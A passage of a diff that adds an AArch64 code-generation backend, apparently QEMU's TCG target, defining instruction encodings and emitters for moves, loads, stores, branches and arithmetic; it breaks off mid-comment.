+ * + * See the COPYING file in the top-level directory for details. + */ + +#include "tcg-be-ldst.h" +#include "qemu/bitops.h" + +/* We're going to re-use TCGType in setting of the SF bit, which controls + the size of the operation performed. If we know the values match, it + makes things much cleaner. */ +QEMU_BUILD_BUG_ON(TCG_TYPE_I32 != 0 || TCG_TYPE_I64 != 1); + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%x0", "%x1", "%x2", "%x3", "%x4", "%x5", "%x6", "%x7", + "%x8", "%x9", "%x10", "%x11", "%x12", "%x13", "%x14", "%x15", + "%x16", "%x17", "%x18", "%x19", "%x20", "%x21", "%x22", "%x23", + "%x24", "%x25", "%x26", "%x27", "%x28", "%fp", "%x30", "%sp", +}; +#endif /* NDEBUG */ + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, + TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, + TCG_REG_X28, /* we will reserve this for GUEST_BASE if configured */ + + TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, + TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, + TCG_REG_X16, TCG_REG_X17, + + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, + + /* X18 reserved by system */ + /* X19 reserved for AREG0 */ + /* X29 reserved as fp */ + /* X30 reserved as temporary */ +}; + +static const int tcg_target_call_iarg_regs[8] = { + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7 +}; +static const int tcg_target_call_oarg_regs[1] = { + TCG_REG_X0 +}; + +#define TCG_REG_TMP TCG_REG_X30 + +#ifndef CONFIG_SOFTMMU +# ifdef CONFIG_USE_GUEST_BASE +# define TCG_REG_GUEST_BASE TCG_REG_X28 +# else +# define TCG_REG_GUEST_BASE TCG_REG_XZR +# endif +#endif + +static inline void reloc_pc26(tcg_insn_unit *code_ptr, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - code_ptr; + assert(offset == sextract64(offset, 0, 26)); + /* read instruction, mask away previous PC_REL26 parameter contents, 
+ set the proper offset, then write back the instruction. */ + *code_ptr = deposit32(*code_ptr, 0, 26, offset); +} + +static inline void reloc_pc19(tcg_insn_unit *code_ptr, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - code_ptr; + assert(offset == sextract64(offset, 0, 19)); + *code_ptr = deposit32(*code_ptr, 5, 19, offset); +} + +static inline void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(addend == 0); + switch (type) { + case R_AARCH64_JUMP26: + case R_AARCH64_CALL26: + reloc_pc26(code_ptr, (tcg_insn_unit *)value); + break; + case R_AARCH64_CONDBR19: + reloc_pc19(code_ptr, (tcg_insn_unit *)value); + break; + default: + tcg_abort(); + } +} + +#define TCG_CT_CONST_AIMM 0x100 +#define TCG_CT_CONST_LIMM 0x200 +#define TCG_CT_CONST_ZERO 0x400 +#define TCG_CT_CONST_MONE 0x800 + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, + const char **pct_str) +{ + const char *ct_str = *pct_str; + + switch (ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, (1ULL << TCG_TARGET_NB_REGS) - 1); + break; + case 'l': /* qemu_ld / qemu_st address, data_reg */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, (1ULL << TCG_TARGET_NB_REGS) - 1); +#ifdef CONFIG_SOFTMMU + /* x0 and x1 will be overwritten when reading the tlb entry, + and x2, and x3 for helper args, better to avoid using them. */ + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X1); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X2); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X3); +#endif + break; + case 'A': /* Valid for arithmetic immediate (positive or negative). */ + ct->ct |= TCG_CT_CONST_AIMM; + break; + case 'L': /* Valid for logical immediate. 
*/ + ct->ct |= TCG_CT_CONST_LIMM; + break; + case 'M': /* minus one */ + ct->ct |= TCG_CT_CONST_MONE; + break; + case 'Z': /* zero */ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + + ct_str++; + *pct_str = ct_str; + return 0; +} + +static inline bool is_aimm(uint64_t val) +{ + return (val & ~0xfff) == 0 || (val & ~0xfff000) == 0; +} + +static inline bool is_limm(uint64_t val) +{ + /* Taking a simplified view of the logical immediates for now, ignoring + the replication that can happen across the field. Match bit patterns + of the forms + 0....01....1 + 0..01..10..0 + and their inverses. */ + + /* Make things easier below, by testing the form with msb clear. */ + if ((int64_t)val < 0) { + val = ~val; + } + if (val == 0) { + return false; + } + val += val & -val; + return (val & (val - 1)) == 0; +} + +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + if ((ct & TCG_CT_CONST_AIMM) && (is_aimm(val) || is_aimm(-val))) { + return 1; + } + if ((ct & TCG_CT_CONST_LIMM) && is_limm(val)) { + return 1; + } + if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } + if ((ct & TCG_CT_CONST_MONE) && val == -1) { + return 1; + } + + return 0; +} + +enum aarch64_cond_code { + COND_EQ = 0x0, + COND_NE = 0x1, + COND_CS = 0x2, /* Unsigned greater or equal */ + COND_HS = COND_CS, /* ALIAS greater or equal */ + COND_CC = 0x3, /* Unsigned less than */ + COND_LO = COND_CC, /* ALIAS Lower */ + COND_MI = 0x4, /* Negative */ + COND_PL = 0x5, /* Zero or greater */ + COND_VS = 0x6, /* Overflow */ + COND_VC = 0x7, /* No overflow */ + COND_HI = 0x8, /* Unsigned greater than */ + COND_LS = 0x9, /* Unsigned less or equal */ + COND_GE = 0xa, + COND_LT = 0xb, + COND_GT = 0xc, + COND_LE = 0xd, + COND_AL = 0xe, + COND_NV = 0xf, /* behaves like COND_AL here */ +}; + +static const enum 
aarch64_cond_code tcg_cond_to_aarch64[] = { + [TCG_COND_EQ] = COND_EQ, + [TCG_COND_NE] = COND_NE, + [TCG_COND_LT] = COND_LT, + [TCG_COND_GE] = COND_GE, + [TCG_COND_LE] = COND_LE, + [TCG_COND_GT] = COND_GT, + /* unsigned */ + [TCG_COND_LTU] = COND_LO, + [TCG_COND_GTU] = COND_HI, + [TCG_COND_GEU] = COND_HS, + [TCG_COND_LEU] = COND_LS, +}; + +typedef enum { + LDST_ST = 0, /* store */ + LDST_LD = 1, /* load */ + LDST_LD_S_X = 2, /* load and sign-extend into Xt */ + LDST_LD_S_W = 3, /* load and sign-extend into Wt */ +} AArch64LdstType; + +/* We encode the format of the insn into the beginning of the name, so that + we can have the preprocessor help "typecheck" the insn vs the output + function. Arm didn't provide us with nice names for the formats, so we + use the section number of the architecture reference manual in which the + instruction group is described. */ +typedef enum { + /* Compare and branch (immediate). */ + I3201_CBZ = 0x34000000, + I3201_CBNZ = 0x35000000, + + /* Conditional branch (immediate). */ + I3202_B_C = 0x54000000, + + /* Unconditional branch (immediate). */ + I3206_B = 0x14000000, + I3206_BL = 0x94000000, + + /* Unconditional branch (register). */ + I3207_BR = 0xd61f0000, + I3207_BLR = 0xd63f0000, + I3207_RET = 0xd65f0000, + + /* Load/store register. Described here as 3.3.12, but the helper + that emits them can transform to 3.3.10 or 3.3.13. 
*/ + I3312_STRB = 0x38000000 | LDST_ST << 22 | MO_8 << 30, + I3312_STRH = 0x38000000 | LDST_ST << 22 | MO_16 << 30, + I3312_STRW = 0x38000000 | LDST_ST << 22 | MO_32 << 30, + I3312_STRX = 0x38000000 | LDST_ST << 22 | MO_64 << 30, + + I3312_LDRB = 0x38000000 | LDST_LD << 22 | MO_8 << 30, + I3312_LDRH = 0x38000000 | LDST_LD << 22 | MO_16 << 30, + I3312_LDRW = 0x38000000 | LDST_LD << 22 | MO_32 << 30, + I3312_LDRX = 0x38000000 | LDST_LD << 22 | MO_64 << 30, + + I3312_LDRSBW = 0x38000000 | LDST_LD_S_W << 22 | MO_8 << 30, + I3312_LDRSHW = 0x38000000 | LDST_LD_S_W << 22 | MO_16 << 30, + + I3312_LDRSBX = 0x38000000 | LDST_LD_S_X << 22 | MO_8 << 30, + I3312_LDRSHX = 0x38000000 | LDST_LD_S_X << 22 | MO_16 << 30, + I3312_LDRSWX = 0x38000000 | LDST_LD_S_X << 22 | MO_32 << 30, + + I3312_TO_I3310 = 0x00206800, + I3312_TO_I3313 = 0x01000000, + + /* Load/store register pair instructions. */ + I3314_LDP = 0x28400000, + I3314_STP = 0x28000000, + + /* Add/subtract immediate instructions. */ + I3401_ADDI = 0x11000000, + I3401_ADDSI = 0x31000000, + I3401_SUBI = 0x51000000, + I3401_SUBSI = 0x71000000, + + /* Bitfield instructions. */ + I3402_BFM = 0x33000000, + I3402_SBFM = 0x13000000, + I3402_UBFM = 0x53000000, + + /* Extract instruction. */ + I3403_EXTR = 0x13800000, + + /* Logical immediate instructions. */ + I3404_ANDI = 0x12000000, + I3404_ORRI = 0x32000000, + I3404_EORI = 0x52000000, + + /* Move wide immediate instructions. */ + I3405_MOVN = 0x12800000, + I3405_MOVZ = 0x52800000, + I3405_MOVK = 0x72800000, + + /* PC relative addressing instructions. */ + I3406_ADR = 0x10000000, + I3406_ADRP = 0x90000000, + + /* Add/subtract shifted register instructions (without a shift). */ + I3502_ADD = 0x0b000000, + I3502_ADDS = 0x2b000000, + I3502_SUB = 0x4b000000, + I3502_SUBS = 0x6b000000, + + /* Add/subtract shifted register instructions (with a shift). */ + I3502S_ADD_LSL = I3502_ADD, + + /* Add/subtract with carry instructions. 
*/ + I3503_ADC = 0x1a000000, + I3503_SBC = 0x5a000000, + + /* Conditional select instructions. */ + I3506_CSEL = 0x1a800000, + I3506_CSINC = 0x1a800400, + + /* Data-processing (1 source) instructions. */ + I3507_REV16 = 0x5ac00400, + I3507_REV32 = 0x5ac00800, + I3507_REV64 = 0x5ac00c00, + + /* Data-processing (2 source) instructions. */ + I3508_LSLV = 0x1ac02000, + I3508_LSRV = 0x1ac02400, + I3508_ASRV = 0x1ac02800, + I3508_RORV = 0x1ac02c00, + I3508_SMULH = 0x9b407c00, + I3508_UMULH = 0x9bc07c00, + I3508_UDIV = 0x1ac00800, + I3508_SDIV = 0x1ac00c00, + + /* Data-processing (3 source) instructions. */ + I3509_MADD = 0x1b000000, + I3509_MSUB = 0x1b008000, + + /* Logical shifted register instructions (without a shift). */ + I3510_AND = 0x0a000000, + I3510_BIC = 0x0a200000, + I3510_ORR = 0x2a000000, + I3510_ORN = 0x2a200000, + I3510_EOR = 0x4a000000, + I3510_EON = 0x4a200000, + I3510_ANDS = 0x6a000000, +} AArch64Insn; + +static inline uint32_t tcg_in32(TCGContext *s) +{ + uint32_t v = *(uint32_t *)s->code_ptr; + return v; +} + +/* Emit an opcode with "type-checking" of the format. */ +#define tcg_out_insn(S, FMT, OP, ...) 
\ + glue(tcg_out_insn_,FMT)(S, glue(glue(glue(I,FMT),_),OP), ## __VA_ARGS__) + +static void tcg_out_insn_3201(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rt, int imm19) +{ + tcg_out32(s, insn | ext << 31 | (imm19 & 0x7ffff) << 5 | rt); +} + +static void tcg_out_insn_3202(TCGContext *s, AArch64Insn insn, + TCGCond c, int imm19) +{ + tcg_out32(s, insn | tcg_cond_to_aarch64[c] | (imm19 & 0x7ffff) << 5); +} + +static void tcg_out_insn_3206(TCGContext *s, AArch64Insn insn, int imm26) +{ + tcg_out32(s, insn | (imm26 & 0x03ffffff)); +} + +static void tcg_out_insn_3207(TCGContext *s, AArch64Insn insn, TCGReg rn) +{ + tcg_out32(s, insn | rn << 5); +} + +static void tcg_out_insn_3314(TCGContext *s, AArch64Insn insn, + TCGReg r1, TCGReg r2, TCGReg rn, + tcg_target_long ofs, bool pre, bool w) +{ + insn |= 1u << 31; /* ext */ + insn |= pre << 24; + insn |= w << 23; + + assert(ofs >= -0x200 && ofs < 0x200 && (ofs & 7) == 0); + insn |= (ofs & (0x7f << 3)) << (15 - 3); + + tcg_out32(s, insn | r2 << 10 | rn << 5 | r1); +} + +static void tcg_out_insn_3401(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, uint64_t aimm) +{ + if (aimm > 0xfff) { + assert((aimm & 0xfff) == 0); + aimm >>= 12; + assert(aimm <= 0xfff); + aimm |= 1 << 12; /* apply LSL 12 */ + } + tcg_out32(s, insn | ext << 31 | aimm << 10 | rn << 5 | rd); +} + +/* This function can be used for both 3.4.2 (Bitfield) and 3.4.4 + (Logical immediate). Both insn groups have N, IMMR and IMMS fields + that feed the DecodeBitMasks pseudo function. 
*/ +static void tcg_out_insn_3402(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, int n, int immr, int imms) +{ + tcg_out32(s, insn | ext << 31 | n << 22 | immr << 16 | imms << 10 + | rn << 5 | rd); +} + +#define tcg_out_insn_3404 tcg_out_insn_3402 + +static void tcg_out_insn_3403(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, int imms) +{ + tcg_out32(s, insn | ext << 31 | ext << 22 | rm << 16 | imms << 10 + | rn << 5 | rd); +} + +/* This function is used for the Move (wide immediate) instruction group. + Note that SHIFT is a full shift count, not the 2 bit HW field. */ +static void tcg_out_insn_3405(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, uint16_t half, unsigned shift) +{ + assert((shift & ~0x30) == 0); + tcg_out32(s, insn | ext << 31 | shift << (21 - 4) | half << 5 | rd); +} + +static void tcg_out_insn_3406(TCGContext *s, AArch64Insn insn, + TCGReg rd, int64_t disp) +{ + tcg_out32(s, insn | (disp & 3) << 29 | (disp & 0x1ffffc) << (5 - 2) | rd); +} + +/* This function is for both 3.5.2 (Add/Subtract shifted register), for + the rare occasion when we actually want to supply a shift amount. */ +static inline void tcg_out_insn_3502S(TCGContext *s, AArch64Insn insn, + TCGType ext, TCGReg rd, TCGReg rn, + TCGReg rm, int imm6) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | imm6 << 10 | rn << 5 | rd); +} + +/* This function is for 3.5.2 (Add/subtract shifted register), + and 3.5.10 (Logical shifted register), for the vast majority of cases + when we don't want to apply a shift. Thus it can also be used for + 3.5.3 (Add/subtract with carry) and 3.5.8 (Data processing 2 source). 
*/ +static void tcg_out_insn_3502(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd); +} + +#define tcg_out_insn_3503 tcg_out_insn_3502 +#define tcg_out_insn_3508 tcg_out_insn_3502 +#define tcg_out_insn_3510 tcg_out_insn_3502 + +static void tcg_out_insn_3506(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, TCGCond c) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd + | tcg_cond_to_aarch64[c] << 12); +} + +static void tcg_out_insn_3507(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn) +{ + tcg_out32(s, insn | ext << 31 | rn << 5 | rd); +} + +static void tcg_out_insn_3509(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, TCGReg ra) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | ra << 10 | rn << 5 | rd); +} + +static void tcg_out_insn_3310(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg base, TCGReg regoff) +{ + /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ + tcg_out32(s, insn | I3312_TO_I3310 | regoff << 16 | base << 5 | rd); +} + + +static void tcg_out_insn_3312(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, intptr_t offset) +{ + tcg_out32(s, insn | (offset & 0x1ff) << 12 | rn << 5 | rd); +} + +static void tcg_out_insn_3313(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, uintptr_t scaled_uimm) +{ + /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ + tcg_out32(s, insn | I3312_TO_I3313 | scaled_uimm << 10 | rn << 5 | rd); +} + +/* Register to register move using ORR (shifted register with no shift). */ +static void tcg_out_movr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rm) +{ + tcg_out_insn(s, 3510, ORR, ext, rd, TCG_REG_XZR, rm); +} + +/* Register to register move using ADDI (move to/from SP). 
*/ +static void tcg_out_movr_sp(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3401, ADDI, ext, rd, rn, 0); +} + +/* This function is used for the Logical (immediate) instruction group. + The value of LIMM must satisfy IS_LIMM. See the comment above about + only supporting simplified logical immediates. */ +static void tcg_out_logicali(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, uint64_t limm) +{ + unsigned h, l, r, c; + + assert(is_limm(limm)); + + h = clz64(limm); + l = ctz64(limm); + if (l == 0) { + r = 0; /* form 0....01....1 */ + c = ctz64(~limm) - 1; + if (h == 0) { + r = clz64(~limm); /* form 1..10..01..1 */ + c += r; + } + } else { + r = 64 - l; /* form 1....10....0 or 0..01..10..0 */ + c = r - h - 1; + } + if (ext == TCG_TYPE_I32) { + r &= 31; + c &= 31; + } + + tcg_out_insn_3404(s, insn, ext, rd, rn, ext, r, c); +} + +static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, + tcg_target_long value) +{ + AArch64Insn insn; + int i, wantinv, shift; + tcg_target_long svalue = value; + tcg_target_long ivalue = ~value; + tcg_target_long imask; + + /* For 32-bit values, discard potential garbage in value. For 64-bit + values within [2**31, 2**32-1], we can create smaller sequences by + interpreting this as a negative 32-bit number, while ensuring that + the high 32 bits are cleared by setting SF=0. */ + if (type == TCG_TYPE_I32 || (value & ~0xffffffffull) == 0) { + svalue = (int32_t)value; + value = (uint32_t)value; + ivalue = (uint32_t)ivalue; + type = TCG_TYPE_I32; + } + + /* Speed things up by handling the common case of small positive + and negative values specially. */ + if ((value & ~0xffffull) == 0) { + tcg_out_insn(s, 3405, MOVZ, type, rd, value, 0); + return; + } else if ((ivalue & ~0xffffull) == 0) { + tcg_out_insn(s, 3405, MOVN, type, rd, ivalue, 0); + return; + } + + /* Check for bitfield immediates. For the benefit of 32-bit quantities, + use the sign-extended value. 
That lets us match rotated values such + as 0xff0000ff with the same 64-bit logic matching 0xffffffffff0000ff. */ + if (is_limm(svalue)) { + tcg_out_logicali(s, I3404_ORRI, type, rd, TCG_REG_XZR, svalue); + return; + } + + /* Look for host pointer values within 4G of the PC. This happens + often when loading pointers to QEMU's own data structures. */ + if (type == TCG_TYPE_I64) { + tcg_target_long disp = (value >> 12) - ((intptr_t)s->code_ptr >> 12); + if (disp == sextract64(disp, 0, 21)) { + tcg_out_insn(s, 3406, ADRP, rd, disp); + if (value & 0xfff) { + tcg_out_insn(s, 3401, ADDI, type, rd, rd, value & 0xfff); + } + return; + } + } + + /* Would it take fewer insns to begin with MOVN? For the value and its + inverse, count the number of 16-bit lanes that are 0. */ + for (i = wantinv = imask = 0; i < 64; i += 16) { + tcg_target_long mask = 0xffffull << i; + if ((value & mask) == 0) { + wantinv -= 1; + } + if ((ivalue & mask) == 0) { + wantinv += 1; + imask |= mask; + } + } + + /* If we had more 0xffff than 0x0000, invert VALUE and use MOVN. */ + insn = I3405_MOVZ; + if (wantinv > 0) { + value = ivalue; + insn = I3405_MOVN; + } + + /* Find the lowest lane that is not 0x0000. */ + shift = ctz64(value) & (63 & -16); + tcg_out_insn_3405(s, insn, type, rd, value >> shift, shift); + + if (wantinv > 0) { + /* Re-invert the value, so MOVK sees non-inverted bits. */ + value = ~value; + /* Clear out all the 0xffff lanes. */ + value ^= imask; + } + /* Clear out the lane that we just set. */ + value &= ~(0xffffUL << shift); + + /* Iterate until all lanes have been set, and thus cleared from VALUE. */ + while (value) { + shift = ctz64(value) & (63 & -16); + tcg_out_insn(s, 3405, MOVK, type, rd, value >> shift, shift); + value &= ~(0xffffUL << shift); + } +} + +/* Define something more legible for general use. 
*/ +#define tcg_out_ldst_r tcg_out_insn_3310 + +static void tcg_out_ldst(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, intptr_t offset) +{ + TCGMemOp size = (uint32_t)insn >> 30; + + /* If the offset is naturally aligned and in range, then we can + use the scaled uimm12 encoding */ + if (offset >= 0 && !(offset & ((1 << size) - 1))) { + uintptr_t scaled_uimm = offset >> size; + if (scaled_uimm <= 0xfff) { + tcg_out_insn_3313(s, insn, rd, rn, scaled_uimm); + return; + } + } + + /* Small signed offsets can use the unscaled encoding. */ + if (offset >= -256 && offset < 256) { + tcg_out_insn_3312(s, insn, rd, rn, offset); + return; + } + + /* Worst-case scenario, move offset to temp register, use reg offset. */ + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, offset); + tcg_out_ldst_r(s, insn, rd, rn, TCG_REG_TMP); +} + +static inline void tcg_out_mov(TCGContext *s, + TCGType type, TCGReg ret, TCGReg arg) +{ + if (ret != arg) { + tcg_out_movr(s, type, ret, arg); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, type == TCG_TYPE_I32 ? I3312_LDRW : I3312_LDRX, + arg, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, type == TCG_TYPE_I32 ? 
I3312_STRW : I3312_STRX, + arg, arg1, arg2); +} + +static inline void tcg_out_bfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, BFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_ubfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, UBFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_sbfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, SBFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_extr(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, TCGReg rm, unsigned int a) +{ + tcg_out_insn(s, 3403, EXTR, ext, rd, rn, rm, a); +} + +static inline void tcg_out_shl(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int bits = ext ? 64 : 32; + int max = bits - 1; + tcg_out_ubfm(s, ext, rd, rn, bits - (m & max), max - (m & max)); +} + +static inline void tcg_out_shr(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_ubfm(s, ext, rd, rn, m & max, max); +} + +static inline void tcg_out_sar(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_sbfm(s, ext, rd, rn, m & max, max); +} + +static inline void tcg_out_rotr(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_extr(s, ext, rd, rn, rn, m & max); +} + +static inline void tcg_out_rotl(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int bits = ext ? 64 : 32; + int max = bits - 1; + tcg_out_extr(s, ext, rd, rn, rn, bits - (m & max)); +} + +static inline void tcg_out_dep(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned lsb, unsigned width) +{ + unsigned size = ext ? 
64 : 32; + unsigned a = (size - lsb) & (size - 1); + unsigned b = width - 1; + tcg_out_bfm(s, ext, rd, rn, a, b); +} + +static void tcg_out_cmp(TCGContext *s, TCGType ext, TCGReg a, + tcg_target_long b, bool const_b) +{ + if (const_b) { + /* Using CMP or CMN aliases. */ + if (b >= 0) { + tcg_out_insn(s, 3401, SUBSI, ext, TCG_REG_XZR, a, b); + } else { + tcg_out_insn(s, 3401, ADDSI, ext, TCG_REG_XZR, a, -b); + } + } else { + /* Using CMP alias SUBS wzr, Wn, Wm */ + tcg_out_insn(s, 3502, SUBS, ext, TCG_REG_XZR, a, b); + } +} + +static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - s->code_ptr; + assert(offset == sextract64(offset, 0, 26)); + tcg_out_insn(s, 3206, B, offset); +} + +static inline void tcg_out_goto_noaddr(TCGContext *s) +{ + /* We pay attention here to not modify the branch target by reading from + the buffer. This ensures that caches and memory are kept coherent during + retranslation. Mask away possible garbage in the high bits for the + first translation, while keeping the offset bits for retranslation. */ + uint32_t old = tcg_in32(s); + tcg_out_insn(s, 3206, B, old); +} + +static inline void tcg_out_goto_cond_noaddr(TCGContext *s, TCGCond c) +{ + /* See comments in tcg_out_goto_noaddr. 
*/ + uint32_t old = tcg_in32(s) >> 5; + tcg_out_insn(s, 3202, B_C, c, old); +} + +static inline void tcg_out_callr(TCGContext *s, TCGReg reg) +{ + tcg_out_insn(s, 3207, BLR, reg); +} + +static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - s->code_ptr; + if (offset == sextract64(offset, 0, 26)) { + tcg_out_insn(s, 3206, BL, offset); + } else { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); + tcg_out_callr(s, TCG_REG_TMP); + } +} + +void aarch64_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr) +{ + tcg_insn_unit *code_ptr = (tcg_insn_unit *)jmp_addr; + tcg_insn_unit *target = (tcg_insn_unit *)addr; + + reloc_pc26(code_ptr, target); + flush_icache_range(jmp_addr, jmp_addr + 4); +} + +static inline void tcg_out_goto_label(TCGContext *s, int label_index) +{ + TCGLabel *l = &s->labels[label_index]; + + if (!l->has_value) { + tcg_out_reloc(s, s->code_ptr, R_AARCH64_JUMP26, label_index, 0); + tcg_out_goto_noaddr(s); + } else { + tcg_out_goto(s, l->u.value_ptr); + } +} + +static void tcg_out_brcond(TCGContext *s, TCGMemOp ext, TCGCond c, TCGArg a, + TCGArg b, bool b_const, int label) +{ + TCGLabel *l = &s->labels[label]; + intptr_t offset; + bool need_cmp; + + if (b_const && b == 0 && (c == TCG_COND_EQ || c == TCG_COND_NE)) { + need_cmp = false; + } else { + need_cmp = true; + tcg_out_cmp(s, ext, a, b, b_const); + } + + if (!l->has_value) { + tcg_out_reloc(s, s->code_ptr, R_AARCH64_CONDBR19, label, 0); + offset = tcg_in32(s) >> 5; + } else { + offset = l->u.value_ptr - s->code_ptr; + assert(offset == sextract64(offset, 0, 19)); + } + + if (need_cmp) { + tcg_out_insn(s, 3202, B_C, c, offset); + } else if (c == TCG_COND_EQ) { + tcg_out_insn(s, 3201, CBZ, ext, a, offset); + } else { + tcg_out_insn(s, 3201, CBNZ, ext, a, offset); + } +} + +static inline void tcg_out_rev64(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV64, TCG_TYPE_I64, rd, rn); +} + +static inline void 
tcg_out_rev32(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV32, TCG_TYPE_I32, rd, rn); +} + +static inline void tcg_out_rev16(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV16, TCG_TYPE_I32, rd, rn); +} + +static inline void tcg_out_sxt(TCGContext *s, TCGType ext, TCGMemOp s_bits, + TCGReg rd, TCGReg rn) +{ + /* Using ALIASes SXTB, SXTH, SXTW, of SBFM Xd, Xn, #0, #7|15|31 */ + int bits = (8 << s_bits) - 1; + tcg_out_sbfm(s, ext, rd, rn, 0, bits); +} + +static inline void tcg_out_uxt(TCGContext *s, TCGMemOp s_bits, + TCGReg rd, TCGReg rn) +{ + /* Using ALIASes UXTB, UXTH of UBFM Wd, Wn, #0, #7|15 */ + int bits = (8 << s_bits) - 1; + tcg_out_ubfm(s, 0, rd, rn, 0, bits); +} + +static void tcg_out_addsubi(TCGContext *s, int ext, TCGReg rd, + TCGReg rn, int64_t aimm) +{ + if (aimm >= 0) { + tcg_out_insn(s, 3401, ADDI, ext, rd, rn, aimm); + } else { + tcg_out_insn(s, 3401, SUBI, ext, rd, rn, -aimm); + } +} + +static inline void tcg_out_addsub2(TCGContext *s, int ext, TCGReg rl, + TCGReg rh, TCGReg al, TCGReg ah, + tcg_target_long bl, tcg_target_long bh, + bool const_bl, bool const_bh, bool sub) +{ + TCGReg orig_rl = rl; + AArch64Insn insn; + + if (rl == ah || (!const_bh && rl == bh)) { + rl = TCG_REG_TMP; + } + + if (const_bl) { + insn = I3401_ADDSI; + if ((bl < 0) ^ sub) { + insn = I3401_SUBSI; + bl = -bl; + } + tcg_out_insn_3401(s, insn, ext, rl, al, bl); + } else { + tcg_out_insn_3502(s, sub ? I3502_SUBS : I3502_ADDS, ext, rl, al, bl); + } + + insn = I3503_ADC; + if (const_bh) { + /* Note that the only two constants we support are 0 and -1, and + that SBC = rn + ~rm + c, so adc -1 is sbc 0, and vice-versa. 
